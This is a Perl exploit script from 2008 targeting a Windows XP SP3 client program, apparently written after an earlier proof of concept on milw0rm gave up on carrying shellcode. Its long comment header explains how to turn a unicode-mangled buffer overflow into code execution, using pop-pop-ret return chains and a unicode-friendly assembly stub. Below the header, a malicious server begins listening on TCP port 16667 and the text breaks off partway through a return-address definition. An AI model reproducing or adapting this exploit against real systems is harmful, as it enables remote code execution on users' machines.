# k'sOSe - 08/24/2008
# This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
# http://www.milw0rm.com/exploits/5817
# The author wrote:
# "The reason why there isn't any shellcode here is because the client is
# converting the junk/buffer data to unicode so it's corrupting the shellcode,
# I've tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but I doubt you can"
# It was this small suggestion of impossibility (copyright Phantasmal Phantasmagoria)
# that made me decide to write this. Actually it was pretty funny :)
# The first problem is how to redirect the execution flow to our buffer; the buffer can be found
# at three different locations:
# - at some address on the stack, converted to unicode
# - at some address on the heap, again converted to unicode
# - at some address on the heap, in plain ASCII
# Unfortunately none of these addresses are unicode friendly :(.
# But.. there is an address on the stack that points into the middle of the buffer (the one on the
# stack); all we need is to pop the stack 6 times and then return.
# To achieve this we return 2 times onto a unicode friendly pop,pop,pop,ret.
# The second problem is that the buffer on the stack is converted to unicode (so \x41 -> \x00\x41)
# *and* must be, with some exceptions, in the \x01 -> \x59 space... so I decided to write a
# unicode friendly ASM stub that loads the address of the ASCII version of the buffer into EAX
# using offsets from a register (somewhat related to our buffer), pushes it and then returns.
# On my box this works 100 times out of 100 :)
use warnings;
use strict;
use IO::Socket;

# Listen on TCP port 16667 and wait for the client to connect
my $sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '16667', Listen => SOMAXCONN, Reuse => 1 );

my $ret = "\xa2\x41"; # pop, p